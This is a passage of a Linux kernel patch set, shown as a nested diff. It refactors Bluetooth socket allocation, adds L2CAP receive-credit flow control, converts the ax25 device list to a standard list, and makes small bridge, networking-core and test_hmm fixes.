+ 
+ 	/*
+ 	 * Expecting three errors.
+diff --git a/lib/test_hmm.c b/lib/test_hmm.c
+index 67e6f83fe0f82..be50a1fdba70b 100644
+--- a/lib/test_hmm.c
++++ b/lib/test_hmm.c
+@@ -1232,8 +1232,8 @@ static void dmirror_device_evict_chunk(struct dmirror_chunk *chunk)
+ 	unsigned long *src_pfns;
+ 	unsigned long *dst_pfns;
+ 
+-	src_pfns = kcalloc(npages, sizeof(*src_pfns), GFP_KERNEL);
+-	dst_pfns = kcalloc(npages, sizeof(*dst_pfns), GFP_KERNEL);
++	src_pfns = kvcalloc(npages, sizeof(*src_pfns), GFP_KERNEL | __GFP_NOFAIL);
++	dst_pfns = kvcalloc(npages, sizeof(*dst_pfns), GFP_KERNEL | __GFP_NOFAIL);
+ 
+ 	migrate_device_range(src_pfns, start_pfn, npages);
+ 	for (i = 0; i < npages; i++) {
+@@ -1256,8 +1256,8 @@ static void dmirror_device_evict_chunk(struct dmirror_chunk *chunk)
+ 	}
+ 	migrate_device_pages(src_pfns, dst_pfns, npages);
+ 	migrate_device_finalize(src_pfns, dst_pfns, npages);
+-	kfree(src_pfns);
+-	kfree(dst_pfns);
++	kvfree(src_pfns);
++	kvfree(dst_pfns);
+ }
+ 
+ /* Removes free pages from the free list so they can't be re-allocated */
+diff --git a/net/ax25/ax25_dev.c b/net/ax25/ax25_dev.c
+index c5462486dbca1..fcc64645bbf5e 100644
+--- a/net/ax25/ax25_dev.c
++++ b/net/ax25/ax25_dev.c
+@@ -22,11 +22,12 @@
+ #include <net/sock.h>
+ #include <linux/uaccess.h>
+ #include <linux/fcntl.h>
++#include <linux/list.h>
+ #include <linux/mm.h>
+ #include <linux/interrupt.h>
+ #include <linux/init.h>
+ 
+-ax25_dev *ax25_dev_list;
++static LIST_HEAD(ax25_dev_list);
+ DEFINE_SPINLOCK(ax25_dev_lock);
+ 
+ ax25_dev *ax25_addr_ax25dev(ax25_address *addr)
+@@ -34,10 +35,11 @@ ax25_dev *ax25_addr_ax25dev(ax25_address *addr)
+ 	ax25_dev *ax25_dev, *res = NULL;
+ 
+ 	spin_lock_bh(&ax25_dev_lock);
+-	for (ax25_dev = ax25_dev_list; ax25_dev != NULL; ax25_dev = ax25_dev->next)
++	list_for_each_entry(ax25_dev, &ax25_dev_list, list)
+ 		if (ax25cmp(addr, (const ax25_address *)ax25_dev->dev->dev_addr) == 0) {
+ 			res = ax25_dev;
+ 			ax25_dev_hold(ax25_dev);
++			break;
+ 		}
+ 	spin_unlock_bh(&ax25_dev_lock);
+ 
+@@ -59,7 +61,6 @@ void ax25_dev_device_up(struct net_device *dev)
+ 	}
+ 
+ 	refcount_set(&ax25_dev->refcount, 1);
+-	dev->ax25_ptr     = ax25_dev;
+ 	ax25_dev->dev     = dev;
+ 	netdev_hold(dev, &ax25_dev->dev_tracker, GFP_KERNEL);
+ 	ax25_dev->forward = NULL;
+@@ -85,10 +86,9 @@ void ax25_dev_device_up(struct net_device *dev)
+ #endif
+ 
+ 	spin_lock_bh(&ax25_dev_lock);
+-	ax25_dev->next = ax25_dev_list;
+-	ax25_dev_list  = ax25_dev;
++	list_add(&ax25_dev->list, &ax25_dev_list);
++	dev->ax25_ptr     = ax25_dev;
+ 	spin_unlock_bh(&ax25_dev_lock);
+-	ax25_dev_hold(ax25_dev);
+ 
+ 	ax25_register_dev_sysctl(ax25_dev);
+ }
+@@ -111,32 +111,19 @@ void ax25_dev_device_down(struct net_device *dev)
+ 	/*
+ 	 *	Remove any packet forwarding that points to this device.
+ 	 */
+-	for (s = ax25_dev_list; s != NULL; s = s->next)
++	list_for_each_entry(s, &ax25_dev_list, list)
+ 		if (s->forward == dev)
+ 			s->forward = NULL;
+ 
+-	if ((s = ax25_dev_list) == ax25_dev) {
+-		ax25_dev_list = s->next;
+-		goto unlock_put;
+-	}
+-
+-	while (s != NULL && s->next != NULL) {
+-		if (s->next == ax25_dev) {
+-			s->next = ax25_dev->next;
+-			goto unlock_put;
++	list_for_each_entry(s, &ax25_dev_list, list) {
++		if (s == ax25_dev) {
++			list_del(&s->list);
++			break;
+ 		}
+-
+-		s = s->next;
+ 	}
+-	spin_unlock_bh(&ax25_dev_lock);
+-	dev->ax25_ptr = NULL;
+-	ax25_dev_put(ax25_dev);
+-	return;
+ 
+-unlock_put:
+-	spin_unlock_bh(&ax25_dev_lock);
+-	ax25_dev_put(ax25_dev);
+ 	dev->ax25_ptr = NULL;
++	spin_unlock_bh(&ax25_dev_lock);
+ 	netdev_put(dev, &ax25_dev->dev_tracker);
+ 	ax25_dev_put(ax25_dev);
+ }
+@@ -200,16 +187,13 @@ struct net_device *ax25_fwd_dev(struct net_device *dev)
+  */
+ void __exit ax25_dev_free(void)
+ {
+-	ax25_dev *s, *ax25_dev;
++	ax25_dev *s, *n;
+ 
+ 	spin_lock_bh(&ax25_dev_lock);
+-	ax25_dev = ax25_dev_list;
+-	while (ax25_dev != NULL) {
+-		s        = ax25_dev;
+-		netdev_put(ax25_dev->dev, &ax25_dev->dev_tracker);
+-		ax25_dev = ax25_dev->next;
++	list_for_each_entry_safe(s, n, &ax25_dev_list, list) {
++		netdev_put(s->dev, &s->dev_tracker);
++		list_del(&s->list);
+ 		kfree(s);
+ 	}
+-	ax25_dev_list = NULL;
+ 	spin_unlock_bh(&ax25_dev_lock);
+ }
+diff --git a/net/bluetooth/af_bluetooth.c b/net/bluetooth/af_bluetooth.c
+index 3f9ff02baafe3..b8b31b79904a8 100644
+--- a/net/bluetooth/af_bluetooth.c
++++ b/net/bluetooth/af_bluetooth.c
+@@ -140,6 +140,27 @@ static int bt_sock_create(struct net *net, struct socket *sock, int proto,
+ 	return err;
+ }
+ 
++struct sock *bt_sock_alloc(struct net *net, struct socket *sock,
++			   struct proto *prot, int proto, gfp_t prio, int kern)
++{
++	struct sock *sk;
++
++	sk = sk_alloc(net, PF_BLUETOOTH, prio, prot, kern);
++	if (!sk)
++		return NULL;
++
++	sock_init_data(sock, sk);
++	INIT_LIST_HEAD(&bt_sk(sk)->accept_q);
++
++	sock_reset_flag(sk, SOCK_ZAPPED);
++
++	sk->sk_protocol = proto;
++	sk->sk_state    = BT_OPEN;
++
++	return sk;
++}
++EXPORT_SYMBOL(bt_sock_alloc);
++
+ void bt_sock_link(struct bt_sock_list *l, struct sock *sk)
+ {
+ 	write_lock(&l->lock);
+diff --git a/net/bluetooth/bnep/sock.c b/net/bluetooth/bnep/sock.c
+index 57d509d77cb46..00d47bcf4d7dc 100644
+--- a/net/bluetooth/bnep/sock.c
++++ b/net/bluetooth/bnep/sock.c
+@@ -205,21 +205,13 @@ static int bnep_sock_create(struct net *net, struct socket *sock, int protocol,
+ 	if (sock->type != SOCK_RAW)
+ 		return -ESOCKTNOSUPPORT;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, GFP_ATOMIC, &bnep_proto, kern);
++	sk = bt_sock_alloc(net, sock, &bnep_proto, protocol, GFP_ATOMIC, kern);
+ 	if (!sk)
+ 		return -ENOMEM;
+ 
+-	sock_init_data(sock, sk);
+-
+ 	sock->ops = &bnep_sock_ops;
+-
+ 	sock->state = SS_UNCONNECTED;
+ 
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = protocol;
+-	sk->sk_state	= BT_OPEN;
+-
+ 	bt_sock_link(&bnep_sk_list, sk);
+ 	return 0;
+ }
+diff --git a/net/bluetooth/hci_sock.c b/net/bluetooth/hci_sock.c
+index 484fc2a8e4baa..730e569cae36d 100644
+--- a/net/bluetooth/hci_sock.c
++++ b/net/bluetooth/hci_sock.c
+@@ -2144,18 +2144,12 @@ static int hci_sock_create(struct net *net, struct socket *sock, int protocol,
+ 
+ 	sock->ops = &hci_sock_ops;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, GFP_ATOMIC, &hci_sk_proto, kern);
++	sk = bt_sock_alloc(net, sock, &hci_sk_proto, protocol, GFP_ATOMIC,
++			   kern);
+ 	if (!sk)
+ 		return -ENOMEM;
+ 
+-	sock_init_data(sock, sk);
+-
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = protocol;
+-
+ 	sock->state = SS_UNCONNECTED;
+-	sk->sk_state = BT_OPEN;
+ 	sk->sk_destruct = hci_sock_destruct;
+ 
+ 	bt_sock_link(&hci_sk_list, sk);
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 91e990accbf20..5fe1008799ab4 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -695,21 +695,13 @@ static struct sock *iso_sock_alloc(struct net *net, struct socket *sock,
+ {
+ 	struct sock *sk;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, prio, &iso_proto, kern);
++	sk = bt_sock_alloc(net, sock, &iso_proto, proto, prio, kern);
+ 	if (!sk)
+ 		return NULL;
+ 
+-	sock_init_data(sock, sk);
+-	INIT_LIST_HEAD(&bt_sk(sk)->accept_q);
+-
+ 	sk->sk_destruct = iso_sock_destruct;
+ 	sk->sk_sndtimeo = ISO_CONN_TIMEOUT;
+ 
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = proto;
+-	sk->sk_state    = BT_OPEN;
+-
+ 	/* Set address type as public as default src address is BDADDR_ANY */
+ 	iso_pi(sk)->src_type = BDADDR_LE_PUBLIC;
+ 
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index c34011113d4c5..5f9a599baa34d 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -477,6 +477,9 @@ struct l2cap_chan *l2cap_chan_create(void)
+ 	/* Set default lock nesting level */
+ 	atomic_set(&chan->nesting, L2CAP_NESTING_NORMAL);
+ 
++	/* Available receive buffer space is initially unknown */
++	chan->rx_avail = -1;
++
+ 	write_lock(&chan_list_lock);
+ 	list_add(&chan->global_l, &chan_list);
+ 	write_unlock(&chan_list_lock);
+@@ -558,6 +561,28 @@ void l2cap_chan_set_defaults(struct l2cap_chan *chan)
+ }
+ EXPORT_SYMBOL_GPL(l2cap_chan_set_defaults);
+ 
++static __u16 l2cap_le_rx_credits(struct l2cap_chan *chan)
++{
++	size_t sdu_len = chan->sdu ? chan->sdu->len : 0;
++
++	if (chan->mps == 0)
++		return 0;
++
++	/* If we don't know the available space in the receiver buffer, give
++	 * enough credits for a full packet.
++	 */
++	if (chan->rx_avail == -1)
++		return (chan->imtu / chan->mps) + 1;
++
++	/* If we know how much space is available in the receive buffer, give
++	 * out as many credits as would fill the buffer.
++	 */
++	if (chan->rx_avail <= sdu_len)
++		return 0;
++
++	return DIV_ROUND_UP(chan->rx_avail - sdu_len, chan->mps);
++}
++
+ static void l2cap_le_flowctl_init(struct l2cap_chan *chan, u16 tx_credits)
+ {
+ 	chan->sdu = NULL;
+@@ -566,8 +591,7 @@ static void l2cap_le_flowctl_init(struct l2cap_chan *chan, u16 tx_credits)
+ 	chan->tx_credits = tx_credits;
+ 	/* Derive MPS from connection MTU to stop HCI fragmentation */
+ 	chan->mps = min_t(u16, chan->imtu, chan->conn->mtu - L2CAP_HDR_SIZE);
+-	/* Give enough credits for a full packet */
+-	chan->rx_credits = (chan->imtu / chan->mps) + 1;
++	chan->rx_credits = l2cap_le_rx_credits(chan);
+ 
+ 	skb_queue_head_init(&chan->tx_q);
+ }
+@@ -579,7 +603,7 @@ static void l2cap_ecred_init(struct l2cap_chan *chan, u16 tx_credits)
+ 	/* L2CAP implementations shall support a minimum MPS of 64 octets */
+ 	if (chan->mps < L2CAP_ECRED_MIN_MPS) {
+ 		chan->mps = L2CAP_ECRED_MIN_MPS;
+-		chan->rx_credits = (chan->imtu / chan->mps) + 1;
++		chan->rx_credits = l2cap_le_rx_credits(chan);
+ 	}
+ }
+ 
+@@ -7529,9 +7553,7 @@ static void l2cap_chan_le_send_credits(struct l2cap_chan *chan)
+ {
+ 	struct l2cap_conn *conn = chan->conn;
+ 	struct l2cap_le_credits pkt;
+-	u16 return_credits;
+-
+-	return_credits = (chan->imtu / chan->mps) + 1;
++	u16 return_credits = l2cap_le_rx_credits(chan);
+ 
+ 	if (chan->rx_credits >= return_credits)
+ 		return;
+@@ -7550,6 +7572,19 @@ static void l2cap_chan_le_send_credits(struct l2cap_chan *chan)
+ 	l2cap_send_cmd(conn, chan->ident, L2CAP_LE_CREDITS, sizeof(pkt), &pkt);
+ }
+ 
++void l2cap_chan_rx_avail(struct l2cap_chan *chan, ssize_t rx_avail)
++{
++	if (chan->rx_avail == rx_avail)
++		return;
++
++	BT_DBG("chan %p has %zd bytes avail for rx", chan, rx_avail);
++
++	chan->rx_avail = rx_avail;
++
++	if (chan->state == BT_CONNECTED)
++		l2cap_chan_le_send_credits(chan);
++}
++
+ static int l2cap_ecred_recv(struct l2cap_chan *chan, struct sk_buff *skb)
+ {
+ 	int err;
+@@ -7559,6 +7594,12 @@ static int l2cap_ecred_recv(struct l2cap_chan *chan, struct sk_buff *skb)
+ 	/* Wait recv to confirm reception before updating the credits */
+ 	err = chan->ops->recv(chan, skb);
+ 
++	if (err < 0 && chan->rx_avail != -1) {
++		BT_ERR("Queueing received LE L2CAP data failed");
++		l2cap_send_disconn_req(chan, ECONNRESET);
++		return err;
++	}
++
+ 	/* Update credits whenever an SDU is received */
+ 	l2cap_chan_le_send_credits(chan);
+ 
+@@ -7581,7 +7622,8 @@ static int l2cap_ecred_data_rcv(struct l2cap_chan *chan, struct sk_buff *skb)
+ 	}
+ 
+ 	chan->rx_credits--;
+-	BT_DBG("rx_credits %u -> %u", chan->rx_credits + 1, chan->rx_credits);
++	BT_DBG("chan %p: rx_credits %u -> %u",
++	       chan, chan->rx_credits + 1, chan->rx_credits);
+ 
+ 	/* Update if remote had run out of credits, this should only happens
+ 	 * if the remote is not using the entire MPS.
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index e3c7029ec8a61..af6d4e3b8c065 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -1165,6 +1165,34 @@ static int l2cap_sock_sendmsg(struct socket *sock, struct msghdr *msg,
+ 	return err;
+ }
+ 
++static void l2cap_publish_rx_avail(struct l2cap_chan *chan)
++{
++	struct sock *sk = chan->data;
++	ssize_t avail = sk->sk_rcvbuf - atomic_read(&sk->sk_rmem_alloc);
++	int expected_skbs, skb_overhead;
++
++	if (avail <= 0) {
++		l2cap_chan_rx_avail(chan, 0);
++		return;
++	}
++
++	if (!chan->mps) {
++		l2cap_chan_rx_avail(chan, -1);
++		return;
++	}
++
++	/* Correct available memory by estimated sk_buff overhead.
++	 * This is significant due to small transfer sizes. However, accept
++	 * at least one full packet if receive space is non-zero.
++	 */
++	expected_skbs = DIV_ROUND_UP(avail, chan->mps);
++	skb_overhead = expected_skbs * sizeof(struct sk_buff);
++	if (skb_overhead < avail)
++		l2cap_chan_rx_avail(chan, avail - skb_overhead);
++	else
++		l2cap_chan_rx_avail(chan, -1);
++}
++
+ static int l2cap_sock_recvmsg(struct socket *sock, struct msghdr *msg,
+ 			      size_t len, int flags)
+ {
+@@ -1201,28 +1229,33 @@ static int l2cap_sock_recvmsg(struct socket *sock, struct msghdr *msg,
+ 	else
+ 		err = bt_sock_recvmsg(sock, msg, len, flags);
+ 
+-	if (pi->chan->mode != L2CAP_MODE_ERTM)
++	if (pi->chan->mode != L2CAP_MODE_ERTM &&
++	    pi->chan->mode != L2CAP_MODE_LE_FLOWCTL &&
++	    pi->chan->mode != L2CAP_MODE_EXT_FLOWCTL)
+ 		return err;
+ 
+-	/* Attempt to put pending rx data in the socket buffer */
+-
+ 	lock_sock(sk);
+ 
+-	if (!test_bit(CONN_LOCAL_BUSY, &pi->chan->conn_state))
+-		goto done;
++	l2cap_publish_rx_avail(pi->chan);
+ 
+-	if (pi->rx_busy_skb) {
+-		if (!__sock_queue_rcv_skb(sk, pi->rx_busy_skb))
+-			pi->rx_busy_skb = NULL;
+-		else
++	/* Attempt to put pending rx data in the socket buffer */
++	while (!list_empty(&pi->rx_busy)) {
++		struct l2cap_rx_busy *rx_busy =
++			list_first_entry(&pi->rx_busy,
++					 struct l2cap_rx_busy,
++					 list);
++		if (__sock_queue_rcv_skb(sk, rx_busy->skb) < 0)
+ 			goto done;
++		list_del(&rx_busy->list);
++		kfree(rx_busy);
+ 	}
+ 
+ 	/* Restore data flow when half of the receive buffer is
+ 	 * available.  This avoids resending large numbers of
+ 	 * frames.
+ 	 */
+-	if (atomic_read(&sk->sk_rmem_alloc) <= sk->sk_rcvbuf >> 1)
++	if (test_bit(CONN_LOCAL_BUSY, &pi->chan->conn_state) &&
++	    atomic_read(&sk->sk_rmem_alloc) <= sk->sk_rcvbuf >> 1)
+ 		l2cap_chan_busy(pi->chan, 0);
+ 
+ done:
+@@ -1483,17 +1516,20 @@ static struct l2cap_chan *l2cap_sock_new_connection_cb(struct l2cap_chan *chan)
+ static int l2cap_sock_recv_cb(struct l2cap_chan *chan, struct sk_buff *skb)
+ {
+ 	struct sock *sk = chan->data;
++	struct l2cap_pinfo *pi = l2cap_pi(sk);
+ 	int err;
+ 
+ 	lock_sock(sk);
+ 
+-	if (l2cap_pi(sk)->rx_busy_skb) {
++	if (chan->mode == L2CAP_MODE_ERTM && !list_empty(&pi->rx_busy)) {
+ 		err = -ENOMEM;
+ 		goto done;
+ 	}
+ 
+ 	if (chan->mode != L2CAP_MODE_ERTM &&
+-	    chan->mode != L2CAP_MODE_STREAMING) {
++	    chan->mode != L2CAP_MODE_STREAMING &&
++	    chan->mode != L2CAP_MODE_LE_FLOWCTL &&
++	    chan->mode != L2CAP_MODE_EXT_FLOWCTL) {
+ 		/* Even if no filter is attached, we could potentially
+ 		 * get errors from security modules, etc.
+ 		 */
+@@ -1504,7 +1540,9 @@ static int l2cap_sock_recv_cb(struct l2cap_chan *chan, struct sk_buff *skb)
+ 
+ 	err = __sock_queue_rcv_skb(sk, skb);
+ 
+-	/* For ERTM, handle one skb that doesn't fit into the recv
++	l2cap_publish_rx_avail(chan);
++
++	/* For ERTM and LE, handle a skb that doesn't fit into the recv
+ 	 * buffer.  This is important to do because the data frames
+ 	 * have already been acked, so the skb cannot be discarded.
+ 	 *
+@@ -1513,8 +1551,18 @@ static int l2cap_sock_recv_cb(struct l2cap_chan *chan, struct sk_buff *skb)
+ 	 * acked and reassembled until there is buffer space
+ 	 * available.
+ 	 */
+-	if (err < 0 && chan->mode == L2CAP_MODE_ERTM) {
+-		l2cap_pi(sk)->rx_busy_skb = skb;
++	if (err < 0 &&
++	    (chan->mode == L2CAP_MODE_ERTM ||
++	     chan->mode == L2CAP_MODE_LE_FLOWCTL ||
++	     chan->mode == L2CAP_MODE_EXT_FLOWCTL)) {
++		struct l2cap_rx_busy *rx_busy =
++			kmalloc(sizeof(*rx_busy), GFP_KERNEL);
++		if (!rx_busy) {
++			err = -ENOMEM;
++			goto done;
++		}
++		rx_busy->skb = skb;
++		list_add_tail(&rx_busy->list, &pi->rx_busy);
+ 		l2cap_chan_busy(chan, 1);
+ 		err = 0;
+ 	}
+@@ -1740,6 +1788,8 @@ static const struct l2cap_ops l2cap_chan_ops = {
+ 
+ static void l2cap_sock_destruct(struct sock *sk)
+ {
++	struct l2cap_rx_busy *rx_busy, *next;
++
+ 	BT_DBG("sk %p", sk);
+ 
+ 	if (l2cap_pi(sk)->chan) {
+@@ -1747,9 +1797,10 @@ static void l2cap_sock_destruct(struct sock *sk)
+ 		l2cap_chan_put(l2cap_pi(sk)->chan);
+ 	}
+ 
+-	if (l2cap_pi(sk)->rx_busy_skb) {
+-		kfree_skb(l2cap_pi(sk)->rx_busy_skb);
+-		l2cap_pi(sk)->rx_busy_skb = NULL;
++	list_for_each_entry_safe(rx_busy, next, &l2cap_pi(sk)->rx_busy, list) {
++		kfree_skb(rx_busy->skb);
++		list_del(&rx_busy->list);
++		kfree(rx_busy);
+ 	}
+ 
+ 	skb_queue_purge(&sk->sk_receive_queue);
+@@ -1833,6 +1884,8 @@ static void l2cap_sock_init(struct sock *sk, struct sock *parent)
+ 
+ 	chan->data = sk;
+ 	chan->ops = &l2cap_chan_ops;
++
++	l2cap_publish_rx_avail(chan);
+ }
+ 
+ static struct proto l2cap_proto = {
+@@ -1847,20 +1900,14 @@ static struct sock *l2cap_sock_alloc(struct net *net, struct socket *sock,
+ 	struct sock *sk;
+ 	struct l2cap_chan *chan;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, prio, &l2cap_proto, kern);
++	sk = bt_sock_alloc(net, sock, &l2cap_proto, proto, prio, kern);
+ 	if (!sk)
+ 		return NULL;
+ 
+-	sock_init_data(sock, sk);
+-	INIT_LIST_HEAD(&bt_sk(sk)->accept_q);
+-
+ 	sk->sk_destruct = l2cap_sock_destruct;
+ 	sk->sk_sndtimeo = L2CAP_CONN_TIMEOUT;
+ 
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = proto;
+-	sk->sk_state = BT_OPEN;
++	INIT_LIST_HEAD(&l2cap_pi(sk)->rx_busy);
+ 
+ 	chan = l2cap_chan_create();
+ 	if (!chan) {
+diff --git a/net/bluetooth/rfcomm/sock.c b/net/bluetooth/rfcomm/sock.c
+index 4397e14ff560f..b54e8a530f55a 100644
+--- a/net/bluetooth/rfcomm/sock.c
++++ b/net/bluetooth/rfcomm/sock.c
+@@ -268,18 +268,16 @@ static struct proto rfcomm_proto = {
+ 	.obj_size	= sizeof(struct rfcomm_pinfo)
+ };
+ 
+-static struct sock *rfcomm_sock_alloc(struct net *net, struct socket *sock, int proto, gfp_t prio, int kern)
++static struct sock *rfcomm_sock_alloc(struct net *net, struct socket *sock,
++				      int proto, gfp_t prio, int kern)
+ {
+ 	struct rfcomm_dlc *d;
+ 	struct sock *sk;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, prio, &rfcomm_proto, kern);
++	sk = bt_sock_alloc(net, sock, &rfcomm_proto, proto, prio, kern);
+ 	if (!sk)
+ 		return NULL;
+ 
+-	sock_init_data(sock, sk);
+-	INIT_LIST_HEAD(&bt_sk(sk)->accept_q);
+-
+ 	d = rfcomm_dlc_alloc(prio);
+ 	if (!d) {
+ 		sk_free(sk);
+@@ -298,11 +296,6 @@ static struct sock *rfcomm_sock_alloc(struct net *net, struct socket *sock, int
+ 	sk->sk_sndbuf = RFCOMM_MAX_CREDITS * RFCOMM_DEFAULT_MTU * 10;
+ 	sk->sk_rcvbuf = RFCOMM_MAX_CREDITS * RFCOMM_DEFAULT_MTU * 10;
+ 
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = proto;
+-	sk->sk_state    = BT_OPEN;
+-
+ 	bt_sock_link(&rfcomm_sk_list, sk);
+ 
+ 	BT_DBG("sk %p", sk);
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 301cf802d32c4..a3bbe04b11383 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -484,21 +484,13 @@ static struct sock *sco_sock_alloc(struct net *net, struct socket *sock,
+ {
+ 	struct sock *sk;
+ 
+-	sk = sk_alloc(net, PF_BLUETOOTH, prio, &sco_proto, kern);
++	sk = bt_sock_alloc(net, sock, &sco_proto, proto, prio, kern);
+ 	if (!sk)
+ 		return NULL;
+ 
+-	sock_init_data(sock, sk);
+-	INIT_LIST_HEAD(&bt_sk(sk)->accept_q);
+-
+ 	sk->sk_destruct = sco_sock_destruct;
+ 	sk->sk_sndtimeo = SCO_CONN_TIMEOUT;
+ 
+-	sock_reset_flag(sk, SOCK_ZAPPED);
+-
+-	sk->sk_protocol = proto;
+-	sk->sk_state    = BT_OPEN;
+-
+ 	sco_pi(sk)->setting = BT_VOICE_CVSD_16BIT;
+ 	sco_pi(sk)->codec.id = BT_CODEC_CVSD;
+ 	sco_pi(sk)->codec.cid = 0xffff;
+diff --git a/net/bridge/br_device.c b/net/bridge/br_device.c
+index b82906fc999a3..036ae99d09841 100644
+--- a/net/bridge/br_device.c
++++ b/net/bridge/br_device.c
+@@ -27,6 +27,7 @@ EXPORT_SYMBOL_GPL(nf_br_ops);
+ /* net device transmit always called with BH disabled */
+ netdev_tx_t br_dev_xmit(struct sk_buff *skb, struct net_device *dev)
+ {
++	enum skb_drop_reason reason = pskb_may_pull_reason(skb, ETH_HLEN);
+ 	struct net_bridge_mcast_port *pmctx_null = NULL;
+ 	struct net_bridge *br = netdev_priv(dev);
+ 	struct net_bridge_mcast *brmctx = &br->multicast_ctx;
+@@ -38,6 +39,11 @@ netdev_tx_t br_dev_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	const unsigned char *dest;
+ 	u16 vid = 0;
+ 
++	if (unlikely(reason != SKB_NOT_DROPPED_YET)) {
++		kfree_skb_reason(skb, reason);
++		return NETDEV_TX_OK;
++	}
++
+ 	memset(skb->cb, 0, sizeof(struct br_input_skb_cb));
+ 
+ 	rcu_read_lock();
+diff --git a/net/bridge/br_mst.c b/net/bridge/br_mst.c
+index ee680adcee179..3c66141d34d62 100644
+--- a/net/bridge/br_mst.c
++++ b/net/bridge/br_mst.c
+@@ -78,7 +78,7 @@ static void br_mst_vlan_set_state(struct net_bridge_port *p, struct net_bridge_v
+ {
+ 	struct net_bridge_vlan_group *vg = nbp_vlan_group(p);
+ 
+-	if (v->state == state)
++	if (br_vlan_get_state(v) == state)
+ 		return;
+ 
+ 	br_vlan_set_state(v, state);
+@@ -100,11 +100,12 @@ int br_mst_set_state(struct net_bridge_port *p, u16 msti, u8 state,
+ 	};
+ 	struct net_bridge_vlan_group *vg;
+ 	struct net_bridge_vlan *v;
+-	int err;
++	int err = 0;
+ 
++	rcu_read_lock();
+ 	vg = nbp_vlan_group(p);
+ 	if (!vg)
+-		return 0;
++		goto out;
+ 
+ 	/* MSTI 0 (CST) state changes are notified via the regular
+ 	 * SWITCHDEV_ATTR_ID_PORT_STP_STATE.
+@@ -112,17 +113,20 @@ int br_mst_set_state(struct net_bridge_port *p, u16 msti, u8 state,
+ 	if (msti) {
+ 		err = switchdev_port_attr_set(p->dev, &attr, extack);
+ 		if (err && err != -EOPNOTSUPP)
+-			return err;
++			goto out;
+ 	}
+ 
+-	list_for_each_entry(v, &vg->vlan_list, vlist) {
++	err = 0;
++	list_for_each_entry_rcu(v, &vg->vlan_list, vlist) {
+ 		if (v->brvlan->msti != msti)
+ 			continue;
+ 
+ 		br_mst_vlan_set_state(p, v, state);
+ 	}
+ 
+-	return 0;
++out:
++	rcu_read_unlock();
++	return err;
+ }
+ 
+ static void br_mst_vlan_sync_state(struct net_bridge_vlan *pv, u16 msti)
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 65284eeec7de5..20d8b9195ef60 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -10300,8 +10300,9 @@ static struct net_device *netdev_wait_allrefs_any(struct list_head *list)
+ 			rebroadcast_time = jiffies;
+ 		}
+ 
++		rcu_barrier();
++
+ 		if (!wait) {
+-			rcu_barrier();
+ 			wait = WAIT_REFS_MIN_MSECS;
+ 		} else {
+ 			msleep(wait);
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 9408dc3bb42d3..cc013be9b02c4 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -744,6 +744,22 @@ int inet_stream_connect(struct socket *sock, struct sockaddr *uaddr,
+ }
+ EXPORT_SYMBOL(inet_stream_connect);
+ 
++void __inet_accept(struct socket *sock, struct socket *newsock, struct sock *newsk)
++{
++	sock_rps_record_flow(newsk);
++	WARN_ON(!((1 << newsk->sk_state) &
++		  (TCPF_ESTABLISHED | TCPF_SYN_RECV |
++		   TCPF_FIN_WAIT1 | TCPF_FIN_WAIT2 |
++		   TCPF_CLOSING | TCPF_CLOSE_WAIT |
++		   TCPF_CLOSE)));
++
++	if (test_bit(SOCK_SUPPORT_ZC, &sock->flags))
++		set_bit(SOCK_SUPPORT_ZC, &newsock->flags);
++	sock_graft(newsk, newsock);
++
++	newsock->state = SS_CONNECTED;
++}
++
+ /*
+  *	Accept a pending connection. The TCP layer now gives BSD semantics.
+  */
+@@ -757,24 +773,12 @@ int inet_accept(struct socket *sock, struct socket *newsock, int flags,
+ 	/* IPV6_ADDRFORM can change sk->sk_prot under us. */
+ 	sk2 = READ_ONCE(sk1->sk_prot)->accept(sk1, flags, &err, kern);
+ 	if (!sk2)
+-		goto do_err;
++		return err;
+ 
+ 	lock_sock(sk2);
+-
+-	sock_rps_record_flow(sk2);
+-	WARN_ON(!((1 << sk2->sk_state) &
+-		  (TCPF_ESTABLISHED | TCPF_SYN_RECV |
+-		  TCPF_CLOSE_WAIT | TCPF_CLOSE)));
+-
+-	if (test_bit(SOCK_SUPPORT_ZC, &sock->flags))
+-		set_bit(SOCK_SUPPORT_ZC, &newsock->flags);
+-	sock_graft(sk2, newsock);
+-
+-	newsock->state = SS_CONNECTED;
+-	err = 0;
++	__inet_accept(sock, newsock, sk2);
+ 	release_sock(sk2);
+-do_err:
+-	return err;
++	return 0;
+ }
+ EXPORT_SYMBOL(inet_accept);
+ 
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 0ad25e6783ac7..321f509f23473 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -28,9 +28,9 @@
+ #include <net/tcp.h>
+ #include <net/sock_reuseport.h>
+ 
+-static u32 inet_ehashfn(const struct net *net, const __be32 laddr,
+-			const __u16 lport, const __be32 faddr,
+-			const __be16 fport)
++u32 inet_ehashfn(const struct net *net, const __be32 laddr,
